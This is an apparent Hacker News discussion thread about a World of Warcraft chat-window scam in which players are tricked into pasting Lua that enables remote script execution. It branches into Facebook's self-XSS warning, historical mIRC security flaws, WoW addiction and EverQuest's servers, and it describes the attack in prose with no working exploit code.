It's funny that if you open developer tools in facebook.com, you get a nice message about not to copy things into the developer console.
Stop!
t78-eatOBZQ.js:172
This is a browser feature intended for developers. If someone told you to copy-paste something here to enable a Facebook feature or "hack" someone's account, it is a scam and will give them access to your Facebook account.
t78-eatOBZQ.js:172
See https://www.facebook.com/selfxss for more information.
You get this when trying to paste on any page in firefox console view:
Scam Warning: Take care when pasting things you don't understand. This could allow attackers to steal your identity or take control of your computer. Please type 'allow pasting' below (no need to press enter) to allow pasting.
Please try to make a more substantive contribution next time. Comments like this don't contribute to the conversation and have quite a distracting effect.
HN has its issues but the least we can do is to take care that the quality of discourse doesn't turn into another Reddit.
Your general concern is commendable, but some content-lite comments are worse than others, and sometimes just making nice is more important than calling it out when a comment is largely benign.
Fair! I actually deleted it first before going back and deciding to post it.
I've started to see more "content-lite" comments recently (along with puns), so I figured it might be good to over-index on pointing out community values.
Hopefully OP was able to see that it wasn't personal and that I meant no harm.
And "hacks" that would make your FB Page go viral and stuff. I used to hear that a lot from close friends and I remember how hard I wanted to laugh but couldn't.
WoW also does similar things to this; see the end of the article. It's good that they specifically relate it to losing items/gold, since many players actually may not make that connection, and may not think the risk is as big as it is.
Reminds me the old days of mIRC (popular IRC client back then) where you could (and still probably can) run similar scenario using mSL language (https://en.wikipedia.org/wiki/MIRC_scripting_language) directly from the chat input.
A script could literally takes control of the computer because mIRC is able to load native code by loading arbitrary DLLs
Back in the 90s mIRC would download files to the root directory of mIRC itself -- long before the concept of separating user data and code became the norm on Windows -- and if people had "auto accept file transfers" enabled people could send you a viral "script.ini" (as I recall it was called) to you and immediately overwrite your customisations. The end result would spread rapidly as the infected users would share it with others who join and left the channels they were in.
Ah, yes, I remember that. I think it was because the modems didn't differentiate between the various layers in the transport stream and took anything resembling low-level modem commands to be gospel.
Yes but that’s invoked at the client side. The mIRC vulnerability discussed is where a message would trigger an /exec due to mIRC auto-downloading a boobytrapped .ini file enabling /exec from external chats.
The equivalent UNIX example would be Irssi auto-downloading a Perl file, loading that, and that Perl script then /exec any commands sent by a remote machine. But as you know, Irssi wouldn’t support auto-downloading, let alone then loading that file too.
Well either way, you still couldn't instigate scripts from Irssi from a remote message unless the client specifically had a Perl plugin telling it to do so (ie the user purposely programmed the IRC client to do it).
Even other Windows IRC clients didn't have this issue. I remember mIRC being particularly terrible in terms of security back in the day. Which is part of the reason it was considered such a joke on any of the more serious IRC channels (that and other features like "mIRC colours"). It's also part of the reason I wrote my own Windows IRC client (this was back in the early to mid-90s so before I switched to Linux as my primary desktop OS).
So I think comparing mIRC to other *nix IRC clients isn't going to get you very far because mIRC was in a whole class of it's own when it came to stupid vulnerabilities.
I really don't think you're comment is a fair counter argument:
1. All your examples of "all irc clients" are just of BitchX. There are a whole plethora of other IRC clients out there yet you highlighted just the one client.
2. You're also just talking about the early versions of BitchX which were widely known as being insecure. So most people who cared stuck with Irssi. (BitchX these days is a lot more secure from what I understand).
3. BitchX didn't even didn't exist "back in the day" as you're referencing. It's first release wasn't until something like the mid-00's. BitchX is actually a relatively late-comer to the scene. So it wasn't around in the era of when mIRC had a bad reputation.
4. Breaking something with a fuzzer isn't even remotely in the same league as a feature which lets users auto-download config files into the application's directory nor the other mIRC bug you highlighted. If you need to start using fuzzers to prove a point then yes you win the argument that "everything is insecure" while completely missing the point being made about specific applications having massive and easily exploitable security holes in them.
Fact is, back in the mid-90s mIRC deserved its reputation. Things obviously improved by the late-90s (thankfully the developers kept releasing new versions of the client when new vulnerabilities were discovered) but mIRC - at that time - was uniquely awful.
For a time BitchX was also pretty bad. Not as bad as mIRC was in it's era but we're now talking a decade or two after mIRC and software development had moved on a lot in that time so it's still a shame that BitchX did have the vulnerabilities it had. However I wouldn't use BitchX as an example that all Linux / UNIX based IRC clients - nor even all clients across any specific OS - were terrible in terms of security because that is simply untrue. Even some of the biggest problems that faced IRC as a protocol (eg IP address being public while internet connected home PCs weren't sat behind firewalls nor NATing meaning it was easy to bypass IRC entirely and hack the host some other way) had been solved by the time BitchX came about.
Irssi's default behaviour is categorically not to auto-download any file someone DCC's to you.
Plus even if those who do enable it, you can still set whitelists up for trusted nicks:
/SET dcc_autoget ON
/SET dcc_autoget_masks nick
It's the default behaviour that matters and Irssi is secure by default. Plus the aforementioned support of a whitelist offers you additional assurances should you wish to enable that risky feature.
> It’s not on by default, just like it wasn’t in mIRC 20 years ago.
I'm pretty sure it was in the early days but I might be wrong there. mIRC did have some crazy defaults initially but those were quickly changed.
> I don’t think you’re making a very convincing case that mIRC was particularly bad.
I beg to differ. You haven't given a single piece of accurate evidence to prove that any other client suffered from the same issues as mIRC. The closest comparison you could come up with was fuzzing against BitchX - which isn't even remotely as embarrassing as the mIRC flaws - and exactly nothing to prove any of the other "all of irc clients" (as you put it) were also equally insecure.
I used a lot of clients in the 90s. I wrote a couple too. mIRC was undoubtably the most user friendly (excluding my second client but I never got around to releasing that) but it was also the worst for security in the early days. Of course that did change. So it might have been the later years when you started using it so you didn't experience some of the problems it had?
Out of curiosity, why is it ever a good idea to add a command to execute arbitrary strings in the same space as the user? eval() has been the same source of headaches in javascript over the years.
I believe WoW uses it primarily to let the player make macros, which is a legit use, but using something like RunScript to do it seems lazy.
eval is by far the easiest way to run arbitrary code, but you can write eval yourself in any fully-general programming language. It doesn't actually give attackers any additional power.
This isn't the eval attack where you accidentally pass attacker-controlled inputs into eval because of an escaping problem or something, the sole purpose of /run is to allow users to run arbitrary Lua in the UI
Metaprogramming. It's possible to generate source code and then evaluate it. For example: one can write a parser generator that compiles a grammar to a Javascript function definition that parses that grammar, which can then be evaluated from within Javascript in order to create the custom function.
Can’t see that as a valid argument. Doing anything in life can cost you dearly.
Personally wow curved me around 2004-2007 as a person.
Helped me find my passion about development in general.
I didn’t feel like I’ve lost something playing wow, actually I have fond memories of it.
Only thing I would change if I could go back was just to spend a bit less time on it, but again I’d play it with passion.
I wouldn't say that playing WoW costs your dearly or is detrimental or toxic to people. I will say that all of the people I've known who played games to their own detriment or in a way that was toxic to their lives were playing WoW. It is attractive to people who want to escape from their problems and not solve them. Because of this, it has somehow come to be seen as a cause of that escapism. It definitely becomes part of a vicious circle -- I play too much WoW because I'm stressed -- I'm not more stressed because I play too much WoW -- but that's the fault of the player, not the game.
All you have seen is correlation. Maybe it is a correlation, because I bet you didn't tried to gather data properly. Assuming that this is a correlation, it might be, for example, that people who for a some reasons cannot cope with their problems tend to escape from them to WoW, and if there were no WoW, they'd do it some other way.
I know it myself. I can run away from my problems by thousands of ways. Cut them all off, and I'll find two thousands more. I can play video games, read books, code some useless programs, engineer some useless devices, surf internet for interesting news, participate in flamewars, write this message, or at the last resort I can just sleep for 20 hrs per a day. If I cannot cope with my problems, then I cannot. My actual behaviour is just a simptom, not the cause of my inability.
It is just anecdotal evidence, for other people it can be the other way around, and maybe for them WoW is the cause of their inability to cope with their problems. What I want to say: don't make conclusions about causation on correlational observations.
Partially true but in my experience if you are cut off of WoW you will not find another way to procrastinate immediately. That's why there were studies that kids and teenagers being cut off from smartphones/tablets have found themselves more mentally healthy. You can search for those, they are out there.
So while I agree in principle -- that the inability to address one's problems is not fixed overnight -- it's also true that removing the distractions you crave the most can and will push you to healthier habits even in the short term.
Nowadays (EDIT: anecdotally, sourced from myself, friends, and forums/Reddit), there's been a player exodus in WoW, as the latest expansion (Battle for Azeroth) has an unrewarding and mandantory grindy endgame, in addition to other player-unfriendly changes which the playerbase suspects is to pad out time-played metrics.
I'm not sure if this is a proper place to discuss WoW, but as a long standing player I can say that BfA is much better in terms of grinding than previous expansion Legion. You don't really need to grind anything, exactly because that grind is unrewarding and you was obliged to grind in Legion exactly because that grind was giving too much power. Again, according to my experience I'm not seeing big player exodus, most of those who started playing in my guild are continue to play, but that's only a personal anecdote, of course. Legion was much better in terms of perceived development cost: new gameplay systems, loads of new art and content, while BfA feels like cheap addon to build upon Legion investment, but that doesn't really makes it bad, it's just feels that they could do better.
> You don't really need to grind anything, exactly because that grind is unrewarding and you was obliged to grind in Legion exactly because that grind was giving too much power.
Interesting perspective. I've always wondered if rewarding grinds or unrewarding nongrinds are better for both player enjoyment and monetization. (I think the former does better; it's how addiction works)
There are different players with different needs which are often contradictory. I don't like to spend many time in-game. Ideal WoW for me is 3 hours/3 days a week, when I log in, enter raid with my friends, spend some time inside trying to kill some bosses, log out. But there are many people who want to play 8-12 hours every day and they love when they can spend that time improving their character. So developers are trying to balance game for both types of players. Basically they are doing rewards which diminish in geometric progression. You can spend hour to get 1% power increased. Next hour will get you 0.5% power increase and so on, so you can spend hours and get that increase, but there's some limit and different players can draw it for themselves. Those who spend more time will be more powerful and those who don't want to spend too much time won't be too that much behind. But still some players think that they are obliged to spend those hours to farm those few % of power even if they hate the process, they just want the rewards. It's unhealthy behavior and only self-control might help there, I guess, otherwise player will burn out and unsubscribe from the game. Probably a hard balance from game developer perspective.
It is basically a race to ilvl 320 and then run warfronts for gear and then go raid/heroics if inclined. Personally, I wish they'd open warfronts up earlier and the gear you get have ilvl similar to how world quest rewards "scale" as your ilvl increases.
I play solo which is an anomaly in the genre I know, but I'm starting to feel burnout: need to run the wheel multiple times so I can do various tradeskills (the 2 tradeskill, including gathering skills, max per character thing) to be self sufficient. Need to do content on characters I'm not interested in doing the content on because, oh, my mage is my tailor and I want to craft bags for my characters which requires non-100% drop BoP tradeskill drops among other things. Reputations supposedly are going to be more forgiving in 8.1, but I'm not sure if it is just Champions of Azeroth that is shared by characters (probably for the neck upgrade) or if all of the BfA reps will be shared across characters (hoping so, for tradeskill rank upgrades).
Even if that's true, the game has had incredible longevity. That expansion came out 14 years(!) after the original release of the game. I'm sure the player base isn't what it used to be, but that has to be some kind of record.
There are longer running MMO's, and the playerbase has faded a bit, but you're absolutely right - it's still a monolith, and to which all other MMO's are compared. Regardless of the BFA problems, it still wields a huge amount of power.
I'm not a WOW player (or really any MMO), but it's always impressed me how willing Blizzard is to throw out all the investment people have made in learning the game system details. Talent trees (or whatever they are called) are rewritten practically each expansion to follow very different rules.
I suppose it has to do with knowing that NOT changing is a guaranteed loss over time, but still, it feels like an unusual attitude.
It's a trend-setting attitude. Relearning skill builds is easy and relatively fun because you already have the skill points/levels and all you do is just allocate them again( provided the new ones are balanced and fun). What blizzard is doing is basically reseting the entire progress of every player in the game every expansion. You might spend 2 years building up your end-game gear and then an expansion comes and the common drops from one level higher are more powerful than the highest drops from the previous one.
EverQuest is 5 years older than WoW, and still chugging along. They aren't doing two expansions a year anymore like they did from 2003-2007, but they have done one a year from 2008 onward (the 2018 expansion is coming out next month).
There was some worry earlier this year that it would abruptly die because of US sanctions on Russian oligarch Viktor Vekselberg who owns the investment group Columbus Nova. The sanctions were freezing assets and blocking payment processing.
There had been earlier reports that Daybreak Games, the company that acquired EverQuest years ago from Sony, had been bought by Columbus Nova. Daybreak later clarified that the person who bought them had been a partner at Columbus Nova, but he bought them personally, not for Columbus Nova, and he was not under sanction.
That was 10 months ago, and they still have their assets and can still accept payments, so apparently they were indeed not part of Columbus Nova. (Although at the time they were bought, a lot of Daybreak people did mention that name, rather than the name of the partner who now they say is the owner, so it is all still confusing).
Anyway, EverQuest today is worth a look if (1) you used to play and want some nostalgia, or (2) you never played but would like to see what one of the classic MMORPGs was about, or (3) if you would like an interesting game, good for grouping or solo play, that has a massive amount of content even if you are playing free.
There were three big changes on the "live" servers (which are distinct from the "progression" servers, which I'll describe later) that made the game a lot more friendly for casual and solo play.
First, a few years ago they added in-game NPC mercenaries that you could hire (one mercenary at a time per character). You can hire a tank, healer, melee damage dealer, or ranged damage dealer, and the AI for the mercenaries is pretty good. They "understand" group play.
With mercenaries, a whole lot of formerly full group only content can be taken reasonably by a couple players each with a mercenary, and even a lot of it can be done with one player with a mercenary, at least up to level 60ish if you are playing free, and up to at least mid 90s if you are paying [1].
Second, they introduced a new line of armor and weapons, Defiant Armor and Defiant Weapons. These things drop from a lot of normal encounters, but the stats on this stuff is comparable to top raid gear from a few expansions earlier. With Defiant, you don't have to dedicate your life to equipping your character to be able to handle the top content from an older expansion. It's only the people who are chasing the leading edge that have to make EverQuest a second career, unlike the old days.
Third, on the role playing server, Firiona Vie, there is a big experience bonus and very very items are marked NO DROP. So if you do need gear better than Defiant gear, you can trade for it or buy it from other players. Mana and healing rates are also higher than older players will remember.
Fourth, there are some new great quests. You start out with a book called the Tomb of the Heroes Journey in your inventory. When you open it, it tells you several zones that would be good at your level. If you open when you are in one of those zones, it suggest several NPCs who have task, quests, and problems you might help with. Just following the Heroes Journey will give you plenty of fun stuff to do, and that is only the tip of the iceberg.
With a mercenary and a free account on FV, you've got an excellent solo game for a long time. Even better for a group of friends.
For those who played before, and are nostalgic for the old days, they have "progression" servers. There are several, but the overall theme is the same. A progression server starts with some old version of EQ, and then progresses through the expansions. Progression servers do not have mercenaries, or Defiant armor. Heck, they are even missing later UI features when they start, such as the wonderful multiple target tracking system that the live servers have.
Progression servers have others rules, varying depending on server, to try to recreate the classic EQ experience that server's players want. For example, one of them is a "true box" server. That means you can only play one account per computer at a time. If you are one of those people who wants to play N characters at once on the same server, you have to have N physical computers if you are on a true box server.
They also differ in when when expansions become available. Some do it on a fixed time schedule. Some do it when the endgame content of the previous expansion is defeated. Some do it by vote. They also differ in how far they go. For example, Agnarr unlocks expansions on a schedule, but will stop at Planes of Power plus the two smaller expansions that followed that. Many consider that the best era of EQ, and Agnarr will be frozen in that era.
Progression servers are not available to free players.
So for those who want a shot of nostalgia, or who never played and want to check out the classic game, the best thing to do is watch for the next progression server launch, and subscribe. A new progression server is always a high population server, with population density comparable to the old days.
[1] The difference is mercenaries. There are apprentice mercenaries, with 5 skill levels (tier I to tier V) and journeymen mercenaries (tier I to V). Free players can only hire apprentices. Around mid 50s a tier V apprentice starts to struggle.
Nostalgia and then reality results in disappointment.
I played EQ 1 for a few years starting in 1999. It was a blast. People were always ad-hoc grouping together, talking to each other after a camp fight.
I remember just starting and my home base being in Queynos and a bunch of us level 5s went with a lvl 12 on an adventure to Freeport. Most of us died and we helped each other with corpse runs. Trains coming out of Black Burrow were a blast, everybody would zone out to that little corridor into West Queynos.
Those days are over though. I did download Project '99 years ago, went through a bunch of hoops to get it running, and 15 minutes later after logging in, just deleted it. Nostalgia meets reality.
Blizz stopped releasing numbers. Now they make PR statements that are intentionally misleading. Given the popularity of addons, some addon makers have a good amount of data that reaches beyond "no idea".
Wow I didn't realize they stopped publishing sub numbers so long ago. I'm not convinced that add-ons give us great insight beyond a certain level of player who tends to use specific add-ons (e.g. DBM), but yeah it's better than nothing.
Still, historically we know that bid drama does not correlate to mass drop in sub numbers. Hell, GC just posted something about that a week or two ago[1].
>Dropping a game because of a specific design change (despite what you might read on forums / Reddit) is actually pretty rare. I know it happens, but if you’re stack ranking the reasons why people quit, those specific responses end up being so far down the list that it is hard for a development team to take actionable feedback.
WoW remains massively successful as far as I'm aware.
They used to as part of their quarterly earnings reports, if I remember correctly. They stopped during the latter part of WoD when by all accounts the subscriber numbers were very low (by WoW standards).
I know you're probably saying this in terms of money, but I had to stop because it was an addiction to play Wow... This game is so addictive to me (I'm sure not just me)! I can't watch streams because it will give me the urge to play.
I hope one day I'll be able to play it normally, but I'm not sure. So yeah definitely it can "cost" a lot to play.
I seem to have addictive tendencies, but there's a whole multi-dimensional spectrum, as far as I can tell. In my case, when I'm working overtime, I'll jump into a game every few hours for 30-60min just to let some of the stress off. It's quite effective, but I end up popping figurative gaming-pills instead of learning to deal with stress in a constructive way. I'll also do something like that after a tiring day. It's not good, because it's grown into an urge that I get when it's time to relax, so I neglect other parts of life to which I'd ideally dedicate that free time.
Specifically, with World of Warcraft it's a game that takes all of your time.
It's an endless treadmill with diminishing returns. It's full of (digital, ultimately meaningless) rewards which make you stand out above the rest of the players. Some of them are worthless in a few weeks/months (e.g. gear), some of it is timeless (e.g. mounts) but takes 100's of tries (every try 30-60 min) for that 1-5% chance to some mount.
When I played the game, there were people who did nothing all Wednesday (when they could try again for the week) but running hours and hours of dungeons just so they could have a change to get the last 10-100 rare mounts they missed.
The highest-tier end-game content requires large groups (20 players + reserves) to coordinate schedules and tackle dungeons together. This causes enormous social pressure to keep showing up because otherwise the group can't play the game and everyone is mad at you.
It's perfectly possible to play it casually without participating in the above, but it's a game that has a lot of traps for people prone to addiction to fall into.
I would add that you can suffer from "Altolism" too and this was my case. I could not commit time for raiding or doing high-end content so I would just levels characters to max level.
So one main for solo content of the week and then back to leveling alts.
the game kind of forces this with 2 trade skill max for characters (provided you are interested in that part of the game, that is. But I've always gravitated towards that from my first MMO Ultima Online playing a blacksmith/miner).
And then Legion with the content that was specific to each class. Loved that idea, but it really made you feel like you were missing out if you didn't have x class to see something.
If FFXI's leveling wasn't so group focused and slow, I'd probably love that system above anyone else: I do like the idea of needing to level various classes, but I'd prefer it be all on one character instead of 12 or so I need to manage.
>If FFXI's leveling wasn't so group focused and slow, I'd probably love that system above anyone else: I do like the idea of needing to level various classes, but I'd prefer it be all on one character instead of 12 or so I need to manage.
FFXIV's mechanic is that you swap gear and that swaps class or something to that effect (I'm not 100% sure). So if I leveled to 15 in ClassA, put on gear for ClassB, I'm a level 15 ClassB.
I'd prefer the job system where you switch to ClassB, but have to level accordingly. I'd hate to be max level of ClassA and then want to try another class and out level content to really practice the class properly (or be swamped with skills early) or end up being unable to help a group because skill in another class is inadequate.
So basically, FFXI but with soloable leveling (in FFXI apparently you could solo with beastmastery or something as a subclass, pet tanking I believe, but it wasn't a starting class so you'd have to work to get it).
I was using Wow to evade the stress from work and life in general. I was doing this at the cost of my family. So week nights instead of doing something with my wife, I would just jump in online and play. I was watching the kid but she's playing by herself and not need me directly, guess I can do a few quests no problem.
So my problem was that gaming was winning over other things all the time on almost every occasion. I was evading responsibilities at home, neglecting my relation with my wife and not giving quality time to my daughter.
So now I'm like 3 months free of gaming and while being hard , I can now see I was using it not for the right reason.
While this attack does not discuss that particular detail, there have been many documented methods for breaking out of the sandbox (you can google around to see citations). I think for most attackers getting access to the user's WoW API is the goal.
The difference is Elder Scrolls Online doesn't have a command to run a script inline from the chat window.
So you are pretty safe unless you specifically install a compromised add on. It is definitely possible for add ons to mail stuff from your account automatically, including gold because some add ons have a "tip" feature built in, and some operate by using the mail to help you transfer stuff to a mule character. So a compromised add on could just set it up so every time you log in it automatically mails 1000 gold to another account.
But at least you would have to install the plugin explicitly instead of just compromising yourself via the chat window.
As a moderately sophisticated user, I wouldn't have expected the function RemoveExtraSpaces to immediately enable a RCE attack. It sounds pretty innocuous.
I don't think RemoveExtraSpaces has any RCE, but it is overwriteable. The "hack" is tricking the user into overwriting it with a different function called RunScript.
Any add-on added by the user is already executing in the client's space and has zero need for a vulnerability like this.
It's like saying that any program running on my computer could exploit a remote code execution bug... I mean, yes, it could. But why would it, when it already has local execution rights?
Because if the add-on just opens up a backdoor, the author can do more specifically targeted things at their whim rather than blasting everyone who installed it? Harder to get caught.
I mean it was already maliciously exploited in a highly used addon. It was a lot easier to slip in a short one liner than some highly suspicious "hack the user" blob of code. It was also extremely flexible. They could then do different things to each person instead of one fixed attack.
Addons are sandboxed. They can affect game interface (in a limited ways) and other addons, but not other software or files. And it's kind of hard to require further sandboxing, because that would limit addon power and one of the reasons people like WoW exactly because addon allow very deep interface customization.
That's why I'm thinking you'd naturally involve a simple permissions model [let script access chat?], just to avoid surprising behavior. Or more specifically, in-game I/O operations (eg trading, sending, etc). The latter would really protect you from everything malicious I can think of, outside of deleting your inventory kind of attacks
There're protection mechanisms for many actions in the game. You can't use spells with addons, you can't move your character, etc. Many actions require hardware event, e.g. you can't just buy something, you need to press button for that. If you're sending mail with gold, you need to confirm that you really want to send that gold and addon can't override that confirmation (so malicious addon can't invisibly send your gold to someone). There wasn't protection for trade window, so malicious attacker could steal your gold and/or items, but Blizzard added that protection very quickly after that exploit was found.
It's just a game, so they don't take it very seriously, I guess. They could just revert transaction using their moderator powers if something bad happens.
The issue is that Lua treats functions as "first-class," meaning that they are stored in variables like other data. This is how named functions are created within the language, and function syntax is sugar for initializing a variable and stuffing a function into it.
This works with API functions also, which is why this works.
most people who play wow don't know what a script is. they just click mobs and do raids. it's not obvious atall to a lot of people, just like phone scams, people who go door to door to scam, or even spam emails. Its for a good reason these things still go on: they are still effecive against people who aren't developers or IT enthousiasts, which most gamers aren't. they like games, not scripting engines and LUA interpreters or w/e
This attack would be pretty easy to mitigate. Why does WoW allow you to run scripts in your chat window? Who needs that functionality?
Yes, don't run untrusted code as a user, but also developers should be practicing defense in depth[0]. This isn't like pasting something into a web browser's dev console or a Bash prompt, WoW has the ability to just outright turn this behavior off.
Look at something like the Signal source code, they flat out turn off webviews entirely[1]. So an entire class of phishing attacks just vanishes, regardless of what they're doing to block XSS or malicious links.
WoW should do the same thing - your chat window should not have access to its host environment, if it even needs the ability to run scripts in the first place.
> Why does WoW allow you to run scripts in your chat window? Who needs that functionality?
The "chat" window in WoW is more like a shell interface/CLI than a pure chat window and it's been that way since the inception of WoW. The mod system is loosely dropped on top of it: basically add-ons in WoW amount to bash scripts.
It's a pretty hacky system that seems like it was made to add modding capability as quickly as possible during development. The fact that such an integral system has never been rewritten isn't hard to believe.
I can buy that -- but wouldn't they still at some point want to make the main chat window for the game into some kind of safer wrapper around the bash prompt?
This is coming from someone who doesn't play WoW; is it common for a mod to expose custom commands in chat or something? Or are mods maybe using it as a buffer to send commands?
I guess if they're detecting and popping up a warning prompt, but they're not willing to get rid of the prompt and just always escape the input, there must be some stuff out there that utterly depends on players clicking "allow". That's baffling to me, but I am often baffled.
> is it common for a mod to expose custom commands in chat or something?
Yes, it's quite common for mods to expose custom commands, although these are not raw Lua functions but rather "slash commands", e.g. /foo
Other than for messaging/chat, the chat box can also be used for various commands for actions your character should perform, e.g. /wave, /target, /sleep and the game also has a built-in macro system that lets you combine several of these into a "macro" that you can then execute by pressing a single button. But these are all "safe", i.e. they don't eval raw Lua code.
There are some WoW quest-tracking websites that will sometimes give you little snippets of Lua to execute via /run that will e.g. query the game about whether you completed the given quest, but in general normal users shouldn't need to use /run, it's more of a feature for mod developers.
I really have no idea why it allows you to run scripts in chat window, LoL. It's useful for me, because I sometimes write addons and use it as kind of REPL, but surely this could be hidden behind "developer mode" in some Config.wtf file. I think that nobody really thought about it too much just like browsers allowed javascript: URLs in the past. Nowadays if you're pasting /run stuff into chat window, WoW asks confirmation whether you really want to execute it, so they took some measures to limit it. Also there are tons of useful `/run` scripts that some people probably use and that experience probably important enough to preserve that functionality.
The vast majority of players won't realize that they can run untrusted code just by typing a few characters into a chat window. To be fair, most chat windows don't work that way.
Stop! t78-eatOBZQ.js:172 This is a browser feature intended for developers. If someone told you to copy-paste something here to enable a Facebook feature or "hack" someone's account, it is a scam and will give them access to your Facebook account. t78-eatOBZQ.js:172 See https://www.facebook.com/selfxss for more information.